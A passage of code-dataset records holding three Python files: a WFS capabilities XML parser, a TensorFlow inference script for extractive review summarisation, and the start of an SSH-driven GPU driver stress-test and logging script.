root.tag.startswith('{http://'):\n # do not use namespace\n ns = {}\n np = ''\n\n feature_type_list = root.find('%sFeatureTypeList' % np, ns)\n if feature_type_list is None:\n self.logger.warning(\n \"No FeatureTypeList found for %s: %s\" %\n (full_url, response.content)\n )\n return {}\n\n if feature_type_list.find('%sFeatureType' % np, ns) is None:\n self.logger.debug(\"No WFS layers found for %s\" % full_url)\n return {}\n\n # NOTE: use ordered keys\n capabilities = OrderedDict()\n\n capabilities['name'] = service_name\n capabilities['wfs_url'] = full_url\n\n # get service title\n service_title = root.find('%sServiceIdentification/%sTitle' % (np_ows, np_ows), ns)\n if service_title is not None:\n capabilities['title'] = service_title.text\n\n # get service abstract\n service_abstract = root.find('%sServiceIdentification/%sAbstract' % (np_ows, np_ows), ns)\n if service_abstract is not None:\n capabilities['abstract'] = service_abstract.text\n\n # collect service keywords\n keyword_list = root.find('%sServiceIdentification/%sKeywords' % (np_ows, np_ows), ns)\n if keyword_list is not None:\n keywords = [\n keyword.text for keyword\n in keyword_list.findall('%sKeyword' % np_ows, ns)\n ]\n if keywords:\n capabilities['keywords'] = ', '.join(keywords)\n\n # service provider\n provider_name = root.find(\"%sServiceProvider/%sProviderName\" % (np_ows, np_ows), ns)\n individual_name = root.find(\"%sServiceProvider/%sServiceContact/%sIndividualName\" % (np_ows, np_ows, np_ows), ns)\n position_name = root.find(\"%sServiceProvider/%sServiceContact/%sPositionName\" % (np_ows, np_ows, np_ows), ns)\n\n capabilities[\"contact\"] = {\n \"person\": individual_name.text if individual_name is not None else None,\n \"organization\": provider_name.text if provider_name is not None else None,\n \"position\": position_name.text if position_name is not None else None\n }\n\n # collect WFS layer attributes\n wfs_layers_attributes = self.collect_wfs_layers_attributes(full_url)\n\n # collect WFS layers\n wfs_layers = []\n for layer in feature_type_list.findall('%sFeatureType' % np, ns):\n # NOTE: use ordered keys\n wfs_layer = OrderedDict()\n\n layer_name = layer.find('%sName' % np, ns).text\n wfs_layer['name'] = layer_name\n wfs_layer['title'] = layer.find('%sTitle' % np, ns).text\n wfs_layer['attributes'] = wfs_layers_attributes.get(layer_name, [])\n\n wfs_layers.append(wfs_layer)\n\n capabilities[\"wfs_layers\"] = wfs_layers\n\n return capabilities\n except Exception as e:\n self.logger.error(\n \"Could not get WFS GetCapabilities from %s:\\n%s\" %\n (full_url, e)\n )\n return {}\n\n def collect_wfs_layers_attributes(self, full_url):\n \"\"\"Get all WFS layer attributes from WFS DescribeFeatureType.\n\n Returns dict as {: []}\n\n :param str full_url: WFS URL\n \"\"\"\n try:\n self.logger.info(\n \"Downloading WFS DescribeFeatureType from %s\" % full_url\n )\n\n response = requests.get(\n full_url,\n params={\n 'SERVICE': 'WFS',\n 'VERSION': '1.1.0',\n 'REQUEST': 'DescribeFeatureType'\n },\n timeout=self.project_settings_read_timeout\n )\n\n if response.status_code != requests.codes.ok:\n self.logger.error(\n \"Could not get WFS DescribeFeatureType from %s:\\n%s\" %\n (full_url, response.content)\n )\n return {}\n\n document = response.content\n\n # parse WFS Capabilities XML\n ElementTree.register_namespace('', 'http://www.w3.org/2001/XMLSchema')\n ElementTree.register_namespace('gml', 'http://www.opengis.net/gml')\n ElementTree.register_namespace('qgs', 'http://www.qgis.org/wms')\n ElementTree.register_namespace('ogc', 'http://www.opengis.net/ogc')\n root = ElementTree.fromstring(document)\n\n # use default namespace for XML search\n # namespace dict\n ns = {'ns': 'http://www.w3.org/2001/XMLSchema'}\n # namespace prefix\n np = 'ns:'\n if not root.tag.startswith('{http://'):\n # do not use namespace\n ns = {}\n np = ''\n\n layers_attributes = {}\n\n for complex_type in root.findall('%scomplexType' % np, ns):\n # extract layer name from complexType by removing \"Type\" suffix\n # e.g. \"edit_pointsType\" -> \"edit_points\"\n layer_name = complex_type.get('name').removesuffix('Type')\n\n attributes = []\n for element in complex_type.findall('%scomplexContent/%sextension/%ssequence/%selement' % (np, np, np, np), ns):\n attributes.append(element.get('name'))\n\n layers_attributes[layer_name] = attributes\n\n return layers_attributes\n except Exception as e:\n self.logger.error(\n \"Could not get WFS DescribeFeatureType from %s:\\n%s\" %\n (full_url, e)\n )\n return {}\n", "repo_name": "qwc-services/qwc-config-generator", "sub_path": "config_generator/capabilities_reader.py", "file_name": "capabilities_reader.py", "file_ext": "py", "file_size_in_byte": 28731, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "urllib.parse.urljoin", "line_number": 51, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 60, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 71, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 81, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 81, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 82, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 82, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 83, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 83, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 84, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 84, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 87, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 87, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 108, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 118, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 169, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 244, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 473, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 480, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 518, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 527, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 538, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 548, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 548, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 549, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 549, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 550, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 550, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 551, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 551, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 552, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 552, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 555, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 555, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 584, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 627, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 658, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 668, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 678, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 678, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 679, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 679, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 680, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 680, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 681, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 681, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 682, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 682, "usage_type": "name"}]} +{"seq_id": "3427895101", "text": "#!/usr/bin/env python\n#coding:utf8\nimport numpy\nimport argparse\nimport logging\nimport os\nimport sys\n#import cPickle as pkl\n#from helper import Config\n#from helper import Dataset\n#from helper import DataLoader\n#from helper import prepare_data\n#from helper import test\nimport data_reader as dr\nimport datetime\nfrom datetime import timedelta\nimport codecs\nimport time\nimport tensorflow as tf\nfrom sklearn import metrics\nfrom model import SummaRuNNer\n\nlogging.basicConfig(level = logging.INFO, format = '%(asctime)s [INFO] %(message)s')\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--sen_len', type=int, default=100)\nparser.add_argument('--doc_len', type=int, default=100)\nparser.add_argument('--train_file', type=str, default='./data/split_90/')\nparser.add_argument('--validation_file', type=str, default='./data/split_90/valid')\n# parser.add_argument('--model_dir', type=str, default='./runs/1532436443/checkpoints/')\nparser.add_argument('--model_dir', type=str, default='./checkpoints/')\nparser.add_argument('--epochs', type=int, default=15)\nparser.add_argument('--hidden', type=int, default=110)\nparser.add_argument('--lr', type=float, default=1e-4)\n\nFLAGS=tf.app.flags.FLAGS\n# 批量预测\ntf.app.flags.DEFINE_boolean(\"predict_incrementally\",True,\"if need to predict only the latest part\") #是否需要增量预测\ntf.app.flags.DEFINE_string(\"predict_target_file\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr.db/dp_struccontent_summary_model/test\",\"predict result\")\nif FLAGS.predict_incrementally == True:\n tf.app.flags.DEFINE_string(\"training_data_path\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr_test.db/temp_summary_high_ctr_seg\",\"path of traning data.\") # recreason_before_lm_model_incre\nif FLAGS.predict_incrementally == False:\n tf.app.flags.DEFINE_string(\"training_data_path\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr_test.db/temp_summary_high_ctr_seg\",\"path of traning data.\") # TODO 用的是test库\n#tf.app.flags.DEFINE_string(\"predict_target_file\",\"viewfs://hadoop-meituan/user/hive/warehouse/mart_dpsr.db/bert_comment_sample_info_seg_lm/test\",\"predict result\")\n#tf.app.flags.DEFINE_string(\"training_data_path\",\"viewfs://hadoop-meituan/user/hive/warehouse/mart_dpsr.db/bert_comment_sample_info_seg_bak\",\"path of traning data.\") # bert数据过滤\ntf.app.flags.DEFINE_string(\"ckpt_dir\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr.db/lantian/summary/\",\"checkpoint location for the model\")\n# tf.app.flags.DEFINE_string(\"vocabulary_word2index\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr.db/lantian/recreason_lm/word2index1203_2.pkl\",\"vocabulary_word2index\")\n# tf.app.flags.DEFINE_string(\"vocabulary_label2index\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr.db/lantian/recreason_lm/label2index1203_2.pkl\",\"vocabulary_label2index\")\ntf.app.flags.DEFINE_string(\"emb_path\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr.db/lantian/summary/model2\",\"word2vec's vocabulary and vectors\")\ntf.app.flags.DEFINE_integer(\"workers\", 1, \"work node num\")\ntf.app.flags.DEFINE_integer(\"task_index\", 0, \"Index of task within the job\")\n\nconfig_proto = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True)\nconfig_proto.gpu_options.allow_growth = True\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\n\n\n\nargs = parser.parse_args()\nmax_sen_length = args.sen_len\nmax_doc_length = args.doc_len\ntart_time = time.time()\nlogging.info('generate config')\n\nstart = datetime.datetime.now()\nprint(\"starting time : \" + str(start))\nworkers = FLAGS.workers\nlist_name = tf.gfile.ListDirectory(FLAGS.training_data_path)\ntotal_file_num = len(list_name)\nprint(\"list_name : \" + str(list_name))\nprint(\"taskindex : \" + str(FLAGS.task_index))\nprint(\"total file num : \" + str(total_file_num))\ncur_file_names = list_name[FLAGS.task_index:total_file_num:FLAGS.total_workers]\nprint(\"cur_file_names : \" + str(cur_file_names))\nfileList = [os.path.join(FLAGS.training_data_path, a) for a in cur_file_names]\nprint(\"fileList : \" + str(fileList))\n\nbatch_size = 1\ntime1 = time.time()\nwrite_index = 0\nshouldEnd = False\nsub_task_id = 0\n\ngraph = tf.Graph()\nwith graph.as_default():\n session_conf = tf.compat.v1.ConfigProto(\n allow_soft_placement=FLAGS.allow_soft_placement,\n log_device_placement=FLAGS.log_device_placement)\n sess = tf.compat.v1.Session(config=session_conf)\n with sess.as_default():\n # saver = tf.compat.v1.train.import_meta_graph('./runs/1564993889/checkpoints/model-512.meta')\n # module_file = tf.train.latest_checkpoint(\"./runs/1564993889/\" + 'checkpoints/')\n saver = tf.compat.v1.train.import_meta_graph(FLAGS.ckpt_dir + 'model.meta')\n module_file = tf.train.latest_checkpoint(FLAGS.ckpt_dir)\n saver.restore(sess, module_file)\n # f0 = codecs.open(\"summaries\", \"w\", \"utf-8\")\n\n while not shouldEnd:\n input_x = graph.get_operation_by_name(\"inputs/x_input\").outputs[0]\n predict = graph.get_operation_by_name(\"score_layer/prediction\").outputs[0]\n resultlines = []\n loss_sum = 0\n count = 0\n # word_vocab, word_tensors, max_doc_length, label_tensors = \\\n # dr.load_test_v2(args.train_file, max_doc_length, max_sen_length)\n # word_vocab, word_tensors, max_doc_length, label_tensors, id_tensors = \\\n # dr.load_test_v3(args.train_file, max_doc_length, max_sen_length)\n word_vocab, word_tensors, max_doc_length, label_tensors, id_tensors, shouldEnd = \\\n dr.load_from_fileList(fileList, write_index, max_doc_length, max_sen_length)\n # test_reader = dr.DataReader(word_tensors['test'], label_tensors['test'],\n # batch_size)\n test_reader = dr.DataReader_v2(word_tensors['test'], label_tensors['test'],\n id_tensors['test'], batch_size)\n\n for x, y, z in test_reader.iter():\n count += 1\n x = x[0]\n y = y[0]\n # print (x)\n y_ = sess.run(predict, feed_dict = {input_x : x})\n # ys_ = sess.run(predict, feed_dict = {input_x, xs})\n # for x, y, y_ in zip(xs[0], ys[0], ys_[0]):\n max_len = 0\n for i, item in enumerate(x):\n #print item\n temp = 0\n for sub_item in item:\n #print(type(int(sub_item)))\n if sub_item > 0:\n temp += 1\n #print temp\n if temp == 0:\n x = x[:i, :max_len]\n y_ = y_[:i]\n y = y[:i]\n break\n if temp > max_len:\n max_len = temp\n x = x[:, :max_len]\n\n tmp_str = ''\n actual_length = 0\n index = 0\n out_flag = 0\n top_sentence_index = numpy.argmax(y_)\n # print(top_sentence_index)\n # print(y_)\n while len(tmp_str) < 10 and out_flag == 0:\n y_[top_sentence_index] = 1\n for word in x[top_sentence_index]:\n if word == 1:\n # tmp_str += str(y_[top_sentence_index]) + '\\t' + str(y[top_sentence_index]) + '\\t'\n continue\n elif word == 2:\n # tmp_str += '\\n'\n break\n else:\n tmp_str += str(word_vocab.token(word))\n if top_sentence_index == len(x) - 1:\n out_flag = 1\n # tmp_str += '\\n'\n elif len(tmp_str) < 10:\n top_sentence_index += 1\n else:\n out_flag = 1\n resultlines.append(str(z)[1:-1] + FLAGS.delimiter + tmp_str + \"\\n\")\n # f0.write(str(z)[1:-1] + '\\t' + tmp_str + '\\n')\n # print(count)\n # print(sub_task_id)\n result_filename = FLAGS.predict_target_file + \"_\" + str(FLAGS.task_index) + \"_\" + str(sub_task_id)\n if FLAGS.predict_incrementally == True:\n result_filename = result_filename + \"_\" + str(datetime.date.today())\n predict_target_file_f = tf.gfile.GFile(result_filename, 'w')\n for result in resultlines:\n predict_target_file_f.write(result)\n predict_target_file_f.close()\n write_index = write_index + FLAGS.line_per_file\n sub_task_id = sub_task_id + 1\n\n time_dif = timedelta(seconds=int(round(time.time() - time1)))\n print(\"Time usage:\", time_dif)\n", "repo_name": "Snoopy666/Extractive-User-Review-Summaruzation-using-LSTM", "sub_path": "predict.py", "file_name": "predict.py", "file_ext": "py", "file_size_in_byte": 8994, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 23, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 23, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_boolean", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tensorflow.ConfigProto", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.flags.DEFINE_boolean", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.flags", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.flags.DEFINE_boolean", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.flags", "line_number": 57, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 64, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.gfile.ListDirectory", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.Graph", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.ConfigProto", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.Session", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.train.import_meta_graph", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 95, "usage_type": "attribute"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 96, "usage_type": "attribute"}, {"api_name": "data_reader.load_from_fileList", "line_number": 111, "usage_type": "call"}, {"api_name": "data_reader.DataReader_v2", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 147, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 174, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.gfile.GFile", "line_number": 175, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 175, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 182, "usage_type": "call"}, {"api_name": "time.time", "line_number": 182, "usage_type": "call"}]} +{"seq_id": "34151617298", "text": "import math\r\nimport os\r\nimport shutil\r\nimport sys\r\nimport time\r\nimport multiprocessing\r\nfrom getpass import getpass\r\nfrom configparser import ConfigParser\r\nimport paramiko\r\nimport pandas as pd\r\nfrom multiprocessing import Process, Manager, Queue\r\nimport namednodes\r\nimport socket\r\nimport csv\r\nfrom datetime import datetime\r\nfrom paramiko.buffered_pipe import PipeTimeout\r\n\r\n## inits\r\nBASE_TEST_PATH=\"stress_automation/tests.csv\"\r\nBASE_PATH=\"C:\\Stress\"\r\nCSV_PATH = os.path.join(BASE_PATH,\"tests.csv\")\r\n\r\ndef logging(comb):\r\n\t#combination number?\r\n\t#comb = math.ceil(test_num/5)\r\n\t# create the log folder\r\n\tlogPath = os.path.join(BASE_PATH, 'logs', 'Combination' + str(comb))\r\n\tscandumpTag = 'Combination' + str(comb)\r\n\tprint(\" =========== In LOGGING function =========== \")\r\n\tos.chdir(logPath)\r\n\tlogName = \"PythonSV.log\"\r\n\tlog(r\"{0}\".format(logName))\r\n\tsv.gfxcard0.tiles.gfx.gtgp.force_wake=0x10001\r\n\tsv.gfxcard0.tiles.gfx.gtgp.driver_render_fwake=0x10001\r\n\tprint(\r\n\t\t\"\\n++++++++++++++++++++++++++++++++++++++++++++++++++LOGGING - IPEHR++++++++++++++++++++++++++++++++++++++++++++\\n\")\r\n\tsv.gfxcard0.tiles.gfx.gtgp.showsearch(\"ipehr\")\r\n\tprint(\r\n\t\t\"\\n++++++++++++++++++++++++++++++++++++++++++++++++++LOGGING - INSTDONE+++++++++++++++++++++++++++++++++++++++++\\n\")\r\n\tsv.gfxcard0.tiles.gfx.gtgp.showsearch(\"instdone_ccs\")\r\n\tprint(\r\n\t\t\"\\n++++++++++++++++++++++++++++++++++++++++++++++++++LOGGING - GTSTATUS+++++++++++++++++++++++++++++++++++++++++\\n\")\r\n\timport pontevecchio.debug.domains.gfx.gt.gtStatus as gs\r\n\tgs.status()\r\n\tprint(\r\n\t\t\"\\n++++++++++++++++++++++++++++++++++++++++++++++++++LOGGING - SOC LOG++++++++++++++++++++++++++++++++++++++++++\\n\")\r\n\timport pontevecchio.fv.ras.error_logging_modules.soc_error_log as soc\r\n\tsoc.soc_error_log()\r\n\tnolog()\r\n\r\n\tif sv.gfxcard0.tile0.taps.pvc_gdt0.debugid and sv.gfxcard0.tile1.taps.pvc_gdt0.debugid == 0:\r\n\t\ttime.sleep(300)\r\n\r\n\tif sv.gfxcard0.tile0.taps.pvc_gdt0.debugid and sv.gfxcard0.tile1.taps.pvc_gdt0.debugid != 0:\r\n\t\tfrom pontevecchio.debug.domains.gfx.tools.scandump import pvcgfxscanAFD as pvcgfxscanAFD\r\n\t\tpvcgfxscanAFD.gtScandump(name=scandumpTag)\r\n\t\ttime.sleep(60)\r\n\telse:\r\n\t\tprint(\"TAP debugid is not proper. Skipping Scandump.\")\r\n\r\ndef checkTarget():\r\n\tTIMEOUT = 500\r\n\twhile TIMEOUT > 0:\r\n\t\tt = os.system('ping -n 4 {0} | find \"bytes=32\" > nul'.format(target))\r\n\t\tif t == 0:\r\n\t\t\tprint(\"Target is UP\")\r\n\t\t\treturn t\r\n\t\telse:\r\n\t\t\tprint(\"Trying to reach the target IP address\")\r\n\t\t\ttime.sleep(1)\r\n\t\t\tTIMEOUT=TIMEOUT-1\r\n\treturn t\r\n\r\n## boot system\r\ndef reset():\r\n\tMODE = \"driver\"\r\n\timport toolext.bootscript.boot as b\r\n\tb.clean_up_vars()\r\n\tstatus = exec(boot)\r\n\r\n\t#execute post boot sequence\r\n\texec(post_boot)\r\n\r\n\tprint(f\"Exited with status = {status}\")\r\n\tprint(\" =========== PythonSV based boot finished =========== \")\r\n\r\n\tstatus = checkTarget()\r\n\tif status == 0:\r\n\t\ttime.sleep(120)\r\n\t\tsshRun(MODE)\r\n\telse:\r\n\t\tprint(\"System is unreachable. Please check.\")\r\n\t\tsys.exit(1)\r\n\r\n\t#delay after driver load\r\n\ttime.sleep(120)\r\n\r\n\t#apply post driver load values\r\n\texec(post_driver)\r\n\r\n## get the csv to understand #tests; create the logs folder on target\r\ndef sshRun(MODE):\r\n\tglobal testsAvailable\r\n\r\n\ttry:\r\n\t\tssh = paramiko.SSHClient()\r\n\t\tssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n\t\tssh.connect(target, 22, user, password)\r\n\texcept paramiko.AuthenticationException:\r\n\t\tprint(\"Authentication failed, please verify your credentials\")\r\n\t\tresult_flag = False\r\n\texcept paramiko.SSHException as sshException:\r\n\t\tprint(\"Could not establish SSH connection: %s\" % sshException)\r\n\t\tresult_flag = False\r\n\texcept socket.timeout as e:\r\n\t\tprint(\"Connection timed out\")\r\n\t\tresult_flag = False\r\n\texcept Exception as e:\r\n\t\tprint(\"Exception in connecting to the server\")\r\n\t\tprint(\"PYTHON SAYS:\",e)\r\n\t\tresult_flag = False\r\n\t\tssh.close()\r\n\telse:\r\n\t\tresult_flag = True\r\n\t\r\n\tif result_flag:\t\r\n\t\tif MODE == \"setup\":\r\n\t\t\t# get the test file\r\n\t\t\tsftp=ssh.open_sftp()\r\n\t\t\tsftp.get(BASE_TEST_PATH,'tests.csv')\r\n\t\t\tsftp.close()\r\n\t\t\t\r\n\t\t\t# get number of tests and setup log folder\r\n\t\t\tlist = pd.read_csv('tests.csv',encoding='cp1252')\r\n\t\t\trows = len(list.index)\r\n\t\t\ttestsAvailable = int(rows/6)\r\n\t\telif MODE == \"driver\":\r\n\t\t\tstdin, stdout, stderr = ssh.exec_command('sudo modprobe i915 enable_rc6=1 rc6_ignore_steppings=1 enable_iaf=0 reset=0 enable_hangcheck=0 enable_rps=1;if lsmod | grep i915; then echo \"Module Loaded\"; echo 300 | sudo tee /sys/class/drm/card1/gt/gt0/rps_min_freq_mhz; echo 300 | sudo tee /sys/class/drm/card1/gt/gt1/rps_min_freq_mhz; for i in /sys/class/drm/card*/engine/*/heartbeat_interval_ms; do echo 0 | sudo tee $i; done; for i in /sys/class/drm/card*/engine/*/preempt_timeout_ms; do echo 0 | sudo tee $i; done; for i in /sys/class/drm/card*/engine/*/max_busywait_duration_ns; do echo 0 | sudo tee $i; done; for i in /sys/class/drm/card*/engine/*/stop_timeout_ms; do echo 0 | sudo tee $i; done; else echo \"Module Not Loaded\"; while :; do echo \"Hit CTRL+C to stop \"; sleep 1; done; fi',get_pty=True)\r\n\t\t\tstdin.write(password)\r\n\t\t\tstdin.write(\"\\n\")\r\n\t\t\tstdin.flush()\r\n\t\telif MODE == \"driver_version\":\r\n\t\t\tstdin, stdout, stderr = ssh.exec_command('uname -a; sudo dpkg -l | grep intel',get_pty=True)\r\n\t\t\tstdin.write(password)\r\n\t\t\tstdin.write(\"\\n\")\r\n\t\t\tstdin.flush()\r\n\t\t\t#for line in iter(stdout.readline, \"\"):\r\n\t\t\t#\tlogging.debug(line)\r\n\t\telif MODE == \"dmesg\":\r\n\t\t\tstdin, stdout, stderr = ssh.exec_command('dmesg -wT',get_pty=True)\r\n\t\t\twith open('dmesg.log','a') as o:\r\n\t\t\t\torig_stdout = sys.stdout\r\n\t\t\t\tsys.stdout = o\r\n\t\t\t\tfor line in iter(stdout.readline,\"\"):\r\n\t\t\t\t\tprint(line.strip('\\n'))\r\n\t\t\t\tsys.stdout = orig_stdout\r\n\t\t\t\to.close()\r\n\telse:\r\n\t\tos._exit(1)\r\n\r\ndef targetLog(q,test_num,args):\r\n\t#combination number?\r\n\tcomb = math.ceil(test_num/6)\r\n\t#create the log folder\r\n\tlogPath=os.path.join(BASE_PATH,'logs','Combination'+str(comb))\r\n\tif not os.path.isdir(logPath):\r\n\t\tos.makedirs(logPath)\r\n\r\n\tos.chdir(logPath)\r\n\r\n\twhile q.empty():\r\n\t\tMODE = \"dmesg\"\r\n\t\tsshRun(MODE)\r\n\r\ndef runTimer(q,args):\r\n\t##calculate timeout in seconds\r\n\ttimeout = args[3]\r\n\r\n\twhile timeout >= 0:\r\n\t\ttime.sleep(1)\r\n\t\ttimeout = timeout - 1\r\n\tq.put(1)\r\n\tprint(\"In timer, hit exit flag, exiting\")\r\n\tos._exit(1)\r\n\r\ndef create_resultsCsv():\r\n\tif os.path.exists('results.csv'):\r\n\t\tos.remove('results.csv')\r\n\theader = ['combination','testnumber', 'time', 'folder', 'command', 'iteration', 'status']\r\n\twith open('results.csv', 'w') as f:\r\n\t\t# create the csv writer\r\n\t\twriter = csv.writer(f)\r\n\t\t# write a row to the csv file\r\n\t\twriter.writerow(header)\r\n\t\tf.close()\r\n\r\ndef copy_to_excel(line):\r\n\tli = line.split(\",\")\r\n\tif(li[0]=='TEST_RESULT'):\r\n\t\tdel li[0]\r\n\t\tli = [x.replace(\"\\r\\n\",\"\") for x in li]\r\n\t\twith open('results.csv', 'a+') as f:\r\n\t\t# create the csv writer\r\n\t\t\twriter = csv.writer(f)\r\n\t\t# write a row to the csv file\r\n\t\t\twriter.writerow(li)\r\n\t\t\tf.close()\r\n\r\ndef runTests(q,test_num,args,MODE=None):\r\n\ttarget = args[0]\r\n\tuser = args[1]\r\n\tpassword = args[2]\r\n\r\n\ttry:\r\n\t\tssh = paramiko.SSHClient()\r\n\t\tssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n\t\tssh.connect(target, 22, user, password)\r\n\texcept paramiko.AuthenticationException:\r\n\t\tprint(\"Authentication failed, please verify your credentials\")\r\n\t\tresult_flag = False\r\n\texcept paramiko.SSHException as sshException:\r\n\t\tprint(\"Could not establish SSH connection: %s\" % sshException)\r\n\t\tresult_flag = False\r\n\texcept socket.timeout as 